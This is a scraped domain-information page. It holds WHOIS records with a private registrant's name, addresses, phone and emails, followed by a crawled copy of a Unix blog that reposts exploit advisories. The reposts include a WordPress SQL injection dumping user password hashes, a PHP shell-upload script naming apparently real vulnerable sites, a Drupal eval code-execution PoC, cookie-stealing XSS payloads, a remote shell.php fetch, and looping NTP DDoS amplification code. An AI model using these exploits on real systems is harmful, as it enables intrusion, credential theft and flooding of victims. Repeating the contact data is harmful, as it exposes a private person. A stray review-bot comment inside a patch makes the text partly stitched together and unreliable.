mondoeventi.com Estimated Worth $227,244 - MYIP.NET Website Information
Whois data

Who is mondoeventi.com at whois.ascio.com

Domain Name: mondoeventi.com

Registry Domain ID: 759857074_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.ascio.com

Registrar URL: http://www.ascio.com

Updated Date: 2016-01-18T22:55:11Z

Creation Date: 2007-01-17T04:12:57Z

Registrar Registration Expiration Date: 2017-01-17T00:00:00Z

Registrar: Ascio Technologies, Inc

Registrar IANA ID: 106

Registrar Abuse Contact Email: abuse

Registrar Abuse Contact Phone: +44.2070159370

For more information on Whois status codes, please visit https://icann.org/epp

Domain Status: OK

Registry Registrant ID:

Registrant Name: D'ANGELI PAOLO

Registrant Organization:

Registrant Street: VIA CONCA D'ORO 184

Registrant City: ROMA

Registrant State/Province: IT

Registrant Postal Code: 00141

Registrant Country: IT

Registrant Phone: +39.3400906285

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: mondoeventi@gmail.com

Registry Admin ID:

Admin Name: PAOLO DANGELI

Admin Organization:

Admin Street: VIA CONCA DORO 190

Admin City: ROMA

Admin State/Province: IT

Admin Postal Code: 00141

Admin Country: IT

Admin Phone: +39.3400906285

Admin Phone Ext:

Admin Fax:

Admin Fax Ext:

Admin Email: dangeli@asdc.asi.it

Registry Tech ID:

Tech Name: Registrazione Domini

Tech Organization: Energ.it S.p.A.

Tech Street: via Efisio Melis, 26

Tech City: Cagliari

Tech State/Province:

Tech Postal Code: 09134

Tech Country: IT

Tech Phone: +39.0707521

Tech Phone Ext:

Tech Fax:

Tech Fax Ext:

Tech Email: domainmaster@energit.it

Name Server: protone.dns.tiscali.it

Name Server: elettrone.dns.tiscali.it

DNSSEC: unsigned

URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

>>> Last update of WHOIS database: 2016-11-20T07:11:22 UTC <<<





Search Engine Spider Emulation

Title:MondoUnix - Unix,Linux,FreeBSD,Howto,Networking,Ipv6
Description:MondoUnix,Unix,Linux,FreeBSD,Howto,Networking,Ipv6,programmazione,virtualizzazione,sistemi operativi,database
Keywords:Unix,Linux,FreeBSD,Howto,Networking,Ipv6,programmazione,virtualizzazione
Body:
MondoUnix - Unix,Linux,FreeBSD,Howto,Networking,Ipv6
MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6
22May/140
WordPress Booking System SQL Injection
# Exploit Title: Wordpress Booking System (Booking Calendar) plugin
SQL Injection
# Release Date: 2014-05-21
# Author: maodun
# Contact: Twitter: @conmancm
# Software Link: http://wordpress.org/support/plugin/booking-system
# Affected version: < 1.3
# Google Dork: inurl:/wp-content/plugins/booking-system/
# REF:CVE-2014-3210
-----------------------------------------------------------------------------------------------------------------
# Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.
-------------------------------------------------------------------------------------------------------------------------
# SQLi - Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerable parameter: $_POST['booking_form_id']
POC:
POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 149
Cookie: [your cookie]
action=dopbs_show_booking_form_fields&booking_form_id=100 union select
1,2,3,4,5,6,7,8,9,hex(concat(user_login,user_pass)) from
wp_users#&language=cr
response:
<input type="hidden" name="booking-form-field-translation-1"
id="booking-form-field-translation-1" value="[hex value here]" />
-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on the 2014-05-05
-- Vendor released version 1.3 on 2014-05-06 Fixed the bug
Tag: 0DAY, BOOKING SYSTEM, EXPLOIT, LINUX, PHP, PLUGINS, REMOTE, SECURITY, SICUREZZA, SQL INJECTION, SQL-I, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, WP-CONTENT
22May/140
WordPress Simple Popup Cross Site Scripting
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress simple popup images Cross site
scripting Vulnerability
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-05-21
|
| [*] Vendor Homepage : http://www.wordpress.org
|
| [*] Google Dork: inurl:wp-content/plugins/simple-popup-images
|
| [*] Tested on: Windows 7
|
| [*] Web browser : mozilla firefox
|-------------------------------------------------------------------------|
|
| [*] Location :
[localhost]/wp-content/plugins/simple-popup-images/popup.php?z=[XSS]
|
|-------------------------------------------------------------------------|
| [*] Proof:
|-------------------------------------------------------------------------|
| [*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
Tag: 0DAY, CROSS SITE SCRIPTING, EXPLOIT, LINUX, PHP, PLUGINS, REMOTE, SECURITY, SICUREZZA, SIMPLE POPUP, SIMPLE_POPUP, SIMPLE_POPUP.PHP, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, WP-CONTENT, XSS
19May/140
WordPress cnhk-slideshow Shell Upload
###############################################################
# Exploit Title: Wordpress cnhk-slideshow plugin Shell Upload
# Author: Ashiyane Digital Security Team
# Date: 05/18/2014
# Vendor Homepage: http://cnhk-systems.webege.com
# Software Link : http://downloads.wordpress.org/plugin/cnhk-slideshow.2.1.1.zip
# Google dork: inurl:/wp-content/plugins/cnhk-slideshow/
# Tested on: Windows/Linux
###############################################################
1) Exploit :
= = = = = =
<?php
$uploadfile="file.php";
$ch = curl_init("http://localhost/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('slideshow'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
2) Exploit demo :
= = = = = = = = =
http://ceochallengeaustralia.org/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
http://www.nhbcc.org/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
http://casaoccio.org/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
http://armorroofingspringfield.com/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
# #### #### #### #### #### #### #### #### #
http://[Target]/wp-content/uploads/[file].php
OR
http://[Target]/wp-content/plugins/cnhk-slideshow/[file].php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #
Tag: 0DAY, ADMIN, CNHK, CNHK-SLIDESHOW, EXPLOIT, LINUX, PHP, PLUGINS, REMOTE, SCRIPT, SECURITY, SHELL UPLOAD, SICUREZZA, SLIDESHOW, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS SECURITY, WP-CONTENT
12May/140
Drupal Flag 7.x-3.5 Command Execution
Drupal Flag 7.x-3.5 Module Vulnerability Report
Author: Ubani Anthony Balogun <ubani@sas.upenn.edu>
Reported: May 07, 2014
Module Description:
-------------------
Flag is a flexible flagging system that is completely customizable by
the administrator.
Using this module, the site administrator can provide any number of
flags for nodes, comments,
users, and any other type of entity. Some possibilities include
bookmarks, marking important,
friends, or flag as offensive. With extensive views integration, you
can create custom lists of
popular content or keep tabs on important content.
Description of Vulnerability:
-----------------------------
The Flag 7.x-3.5 module contains an improper input handling (IH)
vulnerability created by its failure to validate user
supplied PHP code, input via its "flag importer" form, before using
PHP's "eval" function to execute the code on the server.
Using the flag importer form, a malicious user is able to execute
arbitrary code with the permissions of the server on the host machine.
Systems Impacted:
----------------
Drupal 7.26 with Flag 7.x-3.0 and Flag 7.x-3.5 (current recommended
release) were tested and found to be vulnerable
Impact:
-------
Users with the permission to use the flag importer can inject and
execute arbitrary code on the host server with server permissions.
This vulnerability can be exploited to upload a malicious payload onto
the vulnerable server, mount a Denial of Service (DoS) attack
or effect other server-side attacks.
Mitigating Factors:
-------------------
This vulnerability is mitigated by the fact that a user must have
permission to use the flag importer. The Flag module
deactivates this permission by default for users other than site
administrators, and cautions administrators against granting
this permission to other roles.
Proof of Concept:
-----------------
1. Install and enable the Flag module
2. Using an account with permissions to use the flag importer,
navigate to the flag import page (?q=admin/structure/flags/import)
and submit the below code via the "Flag import code" text area:
// Valid flag definition. This is required to successfully submit the flag import form
$flags = array();
// Exported flag: "Bookmarks".
$flags['bookmarks'] = array (
'entity_type' => 'node',
'title' => 'Bookmarks',
'global' => '0',
'types' =>
array (
0 => 'article',
1 => 'page',
2 => 'people',
),
'flag_short' => 'Bookmark this',
'flag_long' => 'Add this post to your bookmarks',
'flag_message' => 'This post has been added to your bookmarks',
'unflag_short' => 'Unbookmark this',
'unflag_long' => 'Remove this post from your bookmarks',
'unflag_message' => 'This post has been removed from your bookmarks',
'unflag_denied_text' => '',
'link_type' => 'toggle',
'weight' => 0,
'show_in_links' =>
array (
'full' => 'full',
'teaser' => 'teaser',
'rss' => 'rss',
'search_index' => 'search_index',
'search_result' => 'search_result',
),
'show_as_field' => 1,
'show_on_form' => 1,
'access_author' => '',
'show_contextual_link' => 1,
'i18n' => 0,
'api_version' => 3,
);
// Malicious user input. Any amount of arbitrary code can be run after here and before the "return flags" statement
system("whoami > /tmp/whoami.txt;");
system("echo \"<?php echo 'I p0wn Server now'; ?>\" >> /tmp/do_evil.php;");
return $flags;
3. On the server machine, navigate to the /tmp directory to find the
created files "whoami.txt" and "do_evil.php".
"whoami.txt" contains the user who executed the code above
(server). "do_evil.php" contains the PHP code submitted
via the flag importer form above.
Note: This proof of concept assumes a linux server is being used. This
does not imply that non-linux systems are not
vulnerable.
Patch:
------
The following patch mitigates the vulnerability
- --- flag-7.x-3.5_vuln/flag/includes/flag.export.inc 2014-05-03
06:39:27.000000000 -0400
+++
/var/www/html/drupal-7.26/sites/all/modules/flag/includes/flag.export.inc
2014-05-07 12:28:19.780973535 -0400
@@ -99,8 +99,17 @@ function flag_import_form() {
*/
function flag_import_form_validate($form, amp;$form_state) {
$flags = array();
+
+ $code = $form_state['values']['import'];
+ $regex =
'#\b(?:(?!array)(?!flags\[))(\$)*([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\s*(\[.*|\(.*))#';
# Regular expression to catch function calls except array(), and
prevent all arrays that aren't of the form quot;flags[] quot; from being
created and used
+
+ if (preg_match($regex,$code,$match)){
+ form_set_error('import',t('The flag import failed because the
following function call was detected in the code: %func',
array('%func' = gt; $match[0])));
+ return;
+ }
+
ob_start();
- - eval($form_state['values']['import']);
+ eval($code);
ob_end_clean();
if (!isset($flags) || !is_array($flags)) {
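Review bot: the new preg_match() check in flag_import_form_validate() is a denylist in front of eval($code), and eval still runs on the submitted text whenever the pattern does not match. The pattern only looks for an identifier followed by "(" or "[", so it cannot be relied on to cover everything PHP will execute, and it will also reject legitimate exports whose string values contain a word followed by a parenthesis or bracket (a label such as 'Remove (this)' matches). I would rather see eval removed here and the import accepted as data only, decoded into $flags and then validated key by key; if eval has to stay, the function comment should say that the import permission is equivalent to code execution on the server.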
Vendor Response:
---------------------
The Drupal Security team was contacted on May 8, 2014 and responded
that because the permissions assignment page
carries the warning "Warning: Give to trusted roles only; this
permission has security implications." a coordinated
security fix and announcement is not warranted.
--
Ubani Anthony Balogun
Information Security and Unix Services
University of Pennsylvania
School of Arts and Sciences
3600 Market St.
Suite 501
Philadelphia, PA 19104
Tag: 0DAY, CMS, COMMAND EXECUTION, DRUPAL, EXPLOIT, FLAG, LINUX, MODULE, PHP, REMOTE, REMOTE COMMAND EXECUTION, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS
12May/140
WordPress Bonuspressx Cross Site Scripting
############################################
[+] Exploit Title : Wordpress Bonuspressx Plugin Cross Site Scripting
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://wordpress.org
[+] Google Dork : inurl:/wp-content/plugins/bonuspressx
[+] Date : 2014-04-23
[+] Tested on : Windows 7 , Mozilla FireFox
############################################
[+] Exploit : Cross Site Scripting
[+] Location :
[Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=[XSS]
############################################
[+] Demo :
############################################
Discovered By : Milad Hacking & Cyber Injector
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
############################################
Tag: 0DAY, AR_SUBMIT, AR_SUBMIT.PHP, BONUSPRESSX, CROSS SITE SCRIPTING, EXPLOIT, LINUX, PHP, PLUGIN, PLUGINS, REMOTE, SECURITY, SICUREZZA, UNIX, UPLOADHANDLER, UPLOADHANDLER.PHP, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, WP SECURITY, XSS
7May/140
Offiria Cross-Site Scripting XSS
Advisory ID: HTB23210
Product: Offiria
Vendor: Slashes & Dots Sdn Bhd.
Vulnerable Version(s): 2.1.0 and probably prior
Tested Version: 2.1.0
Advisory Publication: April 2, 2014 [without technical details]
Vendor Notification: April 2, 2014
Public Disclosure: May 7, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-2689
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in Offiria, which can be exploited to perform
Cross-Site Scripting (XSS) attacks against users of the vulnerable application.
1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689
The vulnerability exists due to insufficient sanitisation of user-supplied data in the URI after the "/installer/index.php"
script, which is not removed from the system by default. A remote attacker can trick a logged-in user into opening a specially
crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The following exploitation example displays the word "immuniweb":
http://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E
-----------------------------------------------------------------------------------------------
Solution:
Currently we are not aware of any official solution for this vulnerability. The vendor did not respond to:
- 6 notifications by email
- 1 notification via twitter
- 1 notification via GitHub
As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file
or WAF.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in
Offiria.
[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE
is a formal list of software weakness types.
[4] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment
solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
Tag: 0DAY, CROSS SITE SCRIPTING, EXPLOIT, LINUX, OFFIRIA, PHP, REMOTE, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, XSS
7May/140
WordPress Photo-Gallery Cross Site Request Forgery
[+] Wordpress Cross Site Request Forgery in Plugin photo-gallery
[+] Date: 07/05/2014
[+] Risk: HIGH
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://wordpress.org/plugins/photo-gallery/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: UploadHandler.php
[+] Dork: inurl:"wp-content/plugins/photo-gallery/filemanager"
[+] Exploit :
<form enctype="multipart/form-data"
action="http://host/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
[+] PoC : http://klikkit.co.uk/silvio/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php
http://mii-gamer.com/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php
http://www.bentart.com.au/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php
Tag: 0DAY, CROSS SITE REQUEST FORGERY, CSRF, EXPLOIT, FILEMANAGER, LINUX, PHOTO-GALLERY, PHP, PLUGIN, PLUGINS, REMOTE, SCRIPT, SECURITY, SICUREZZA, UNIX, UPLOADHANDLER, UPLOADHANDLER.PHP, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS SECURITY, WP-CONTENT
6May/140
WordPress multiple vulnerabilities Flexolio theme
Hello list!
There are Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities in Flexolio for WordPress. Which contains TimThumb and CU3ER.
In April 2011 I wrote about vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote about vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244).
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Flexolio.
-------------------------
Affected vendors:
-------------------------
Quarterpixel
http://quarterpixel.de
----------
Details:
----------
Content Spoofing (Content Injection) (WASC-12):
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files.
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://
And also Abuse of Functionality and DoS in vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload vulnerability, which was disclosed after 3,5 months after my disclosure of previous holes. They are possible in old versions of the theme, because in the last versions of the theme in TimThumb the access to remote sites is forbidden.
Arbitrary File Upload (WASC-31):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php
Full path disclosure (WASC-13):
FPD in php-files of the theme (by default) or in error_log. In index.php and other php-files.
http://site/wp-content/themes/webfolio/
------------
Timeline:
------------
2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins and later about themes. Later informed developers of the plugins and themes.
2014.04.26 - disclosed at my site about Flexolio for WordPress (http://websecurity.com.ua/7141/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Tag: 0DAY, ARBITRARY FILE UPLOAD, CROSS SITE SCRIPTING, EXPLOIT, FLEXOLIO, FULL PATH DISCLOSURE, FUNCTION, LINUX, MULTIPLE, PHP, REMOTE, SECURITY, SICUREZZA, SQL INJECTION, SQL-I, THEMES, TUMB.PHP, UNIX, VULNERABILITIES, VULNERABILITY, WASC-08, WASC-13, WASC-31, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, XSS
5May/140
NTP DDoS Amplification
/*
* Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification
* Date: 28/04/2014
* Code Author: Danilo PC - <DaNotKnow@gmail.com>
* CVE : CVE-2013-5211
*/
/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)
* I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,
* if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.
*/
/* MODIFICATION */
/*---------------------------------------------------------------------------------------------------------------
* ntpd 'get monlist' ddos amplification cve-2013-5211 exploit Todor Donev (todor.donev @@ gmail.com)
*---------------------------------------------------------------------------------------------------------------
* A Network Time Protocol (NTP) Amplification attack is an emerging form of Distributed Denial of Service (DDoS)
* that relies on the use of publically accessible NTP servers to overwhelm a victim system with UDP traffic.
*
* The attack relies on the exploitation of the 'monlist' feature of NTP, as described in CVE-2013-5211, which is
* enabled by default on older NTP-capable devices. This command causes a list of the last 600 IP addresses which
* connected to the NTP server to be sent to the victim. Due to the spoofed source address, when the NTP server
* sends the response it is sent instead to the victim. Because the size of the response is typically considerably
* larger than the request, the attacker is able to amplify the volume of traffic directed at the victim.
* Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult
* to block these types of attacks. The solution is to disable "monlist" within the NTP server or to upgrade to
* the latest version of NTP (4.2.7) which disables the "monlist" functionality.
*---------------------------------------------------------------------------------------------------------------
* PoC generate and send 1 spoofed packet and don't do enough to Distributed Denial of Service.I'm made loop for
* sending multiple packets. Now this exploit is very dangerous against unpatched NTP servers. They can respond
* back to spoofed IP address (victim). The size of the response is typically considerably larger than the request.
*---------------------------------------------------------------------------------------------------------------
* use at your own risk | use at your own risk | use at your own risk | use at your own risk | use at your own risk
*---------------------------------------------------------------------------------------------------------------
*/
#include <stdio.h> // For on printf function
#include <string.h> // For memset
#include <sys/socket.h> // Structs and Functions used for sockets operations.
#include <stdlib.h> // For exit function
#include <netinet/ip.h> // Structs for IP header
// Struct for UDP Packet
struct udpheader{
unsigned short int udp_sourcePortNumber;
unsigned short int udp_destinationPortNumber;
unsigned short int udp_length;
unsigned short int udp_checksum;
};
// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
struct ntpreqheader {
unsigned char rm_vn_mode; /* response, more, version, mode */
unsigned char auth_seq; /* key, sequence number */
unsigned char implementation; /* implementation number */
unsigned char request; /* request number */
unsigned short err_nitems; /* error code/number of data items */
unsigned short mbz_itemsize; /* item size */
char data[40]; /* data area [32 prev](176 byte max) */
unsigned long tstamp; /* time stamp, for authentication */
unsigned int keyid; /* encryption key */
char mac[8]; /* (optional) 8 byte auth code */
};
// Calculates the checksum of the ip header.
unsigned short csum(unsigned short *ptr,int nbytes)
{
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
// Da MAIN
int main(int argc, char **argv)
{
int status; // Maintains the return values of the functions
struct iphdr *ip; // Pointer to ip header struct
struct udpheader *udp; // Pointer to udp header struct
struct ntpreqheader *ntp; // Pointer to ntp request header struct
int sockfd; // Maintains the socket file descriptor
int one = 1; // Sets the option IP_HDRINCL of the socket to tell
// the kernel that the headers are already included in the packets.
struct sockaddr_in dest; // Maintains the data of the destination address
printf(" [o] ntpd 'get monlist' ddos amplification cve-2013-5211 exploit \n");
// Packet itself
char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ];
// Parameters check
if( argc != 3){
printf(" [o] usg: ./ntpamp <src> <ntpd>\n");
exit(1);
}
// "Zeroes" all the packet stack
memset( packet, 0, sizeof(packet) );
// Mounts the packet headers
// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
ip = (struct iphdr *)packet;
udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
// Fill the IP Header
ip->version = 4; // IPv4
ip->ihl = 5; // Size of the IP header, minimum 5
ip->tos = 0; // Type of service, the default value is 0
ip->tot_len = sizeof(packet); // Size of the datagram
ip->id = htons(1234); // Identification number
ip->frag_off = 0; // Flags, zero represents reserved
ip->ttl = 255; // Time to Live. Maximum of 255
ip->protocol = IPPROTO_UDP; // Sets the UDP as the next layer protocol
ip->check = 0; // Checksum.
ip->saddr = inet_addr( argv[1] ); // Source ip ( spoofing goes here)
ip->daddr = inet_addr( argv[2] ); // Destination IP
// Fills the UDP Header
udp->udp_sourcePortNumber = htons( atoi("123") ); // Source Port
udp->udp_destinationPortNumber = htons(atoi("123")) ; // Destination Port
udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); // Length of the packet
udp->udp_checksum = 0; // Checksum
// Calculate the checksums
ip->check = csum((unsigned short *)packet, ip->tot_len); // Calculate the checksum for IP header
// Sets the destination data
dest.sin_family = AF_INET; // Address Family Ipv4
dest.sin_port = htons (atoi("123") ) ; // Destination port
dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination address the packet is sent to
// Fills the NTP header
// Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
// To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
// ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
// To learn more, read this: http://searchcode.com/codesearch/view/451164#127
ntp->rm_vn_mode=0x27; // Sets the response bit to 0, More bit to 0,
// Version field to 4, Mode field to 7 Private
ntp->implementation=0x03; // Sets the implementation to 3 (XNTPD)
ntp->request=0x2a; // Sets the request field to 42 ( MON_GETLIST_1 )
//All the other fields of the struct are zeroed
// Create a socket and tells the kernel that we want to use udp as layer 4 protocol
if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP)) < 0){
perror(" [-] Error");
exit(1);
}
if ((connect(sockfd,(const struct sockaddr *)&dest,sizeof(dest))) < 0){
perror(" [-] Error");
close(sockfd);
exit(1);
}
// Sets the option IP_HDRINCL
if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0){
perror(" [-] Error");
exit(1);
}
// Sends the packets
printf(" [+] sending ntp query src: %s -> dst: %s\n", argv[1], argv[2]);
while(1){
if ( sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) < 0), sleep(2)){
perror(" [-] Error");
exit(1);
}
}
}
Filed under: EXPLOIT, REMOTE
3 May 2014
From TrekStor, the new DVB-T stick for Android tablets and smartphones
Aimed at everyone who does not want to give up entertainment on the move, TrekStor is launching the new DVB-T Stick Terres droid, which turns an Android™ smartphone or tablet into a handy portable TV.
On the train or the underground, in the park during a picnic or at work, it does not matter where you are: just connect the TrekStor Terres droid stick to your Android™ mobile device to receive all TV channels.
Terres droid is designed for portable entertainment with simple, intuitive operation: after setting up the tablet with the free AirDTV app (available at www.trekstor.de and via Google Play) and connecting the USB stick to the tablet, just plug in the supplied external antenna for mobile entertainment or, if available, the standard household socket (MCX adapter).
On first use you only need to run the automatic channel search and that's it: you can now enjoy your favourite programmes and even record them!
With a sober, discreet design, Terres droid is so light (it weighs only 5 grams) and small (it measures just 4 centimetres) that it is easy to carry inside tablet cases, but also in a bag or even a pocket.
The handy recorder function also gives you the freedom to decide for yourself when to watch your favourite programmes, regardless of the TV schedule. Setting up a recording is really simple and can be done in a few simple steps, either manually or using the electronic programme guide (EPG), which keeps you up to date on current programming and provides summaries and background information.
This way you always have an overview of the entire schedule for the coming weeks.
DVB-T Stick Terres droid is an accessory for Android™ devices and is compatible with all TrekStor SurfTabs tablets and all tablets or smartphones with a USB port with "host" function!
For more information: www.trekstor.it
Specs TrekStor DVB-T Stick Terres droid:
Interface: 1 x Micro-USB 2.0, coaxial socket for external DVB-T antenna or household socket (MCX adapter)
Dimensions (W x H x D): 29 mm x 28 mm x 9 mm
Weight: approx. 5 g (device only/without accessories)
Housing material: Plastic
Colour: Black
Input: 75 Ohm DIN
System requirements for the software
Software: AirDTV App (available at www.trekstor.de and via Google Play)
Languages: German, English, Italian, Spanish, French, Polish
Package contents: DVB-T Stick Terres droid, antenna with magnetic base, MCX adapter, telescopic antenna, user manual
Suitable for all TrekStor SurfTabs and for Android tablets running Android 4.0 or later, with a Micro-USB host (OTG) connector and a Rockchip RK30 or RK31, Boxchip A13 or AMLogic dual-core processor.
Source: http://tecnologia.tiscali.it/articoli/news/elettronica-di-consumo/14/04/trekstor-dvb-t-stick-terres-droid-tv-portatile-android.html?news_elettronica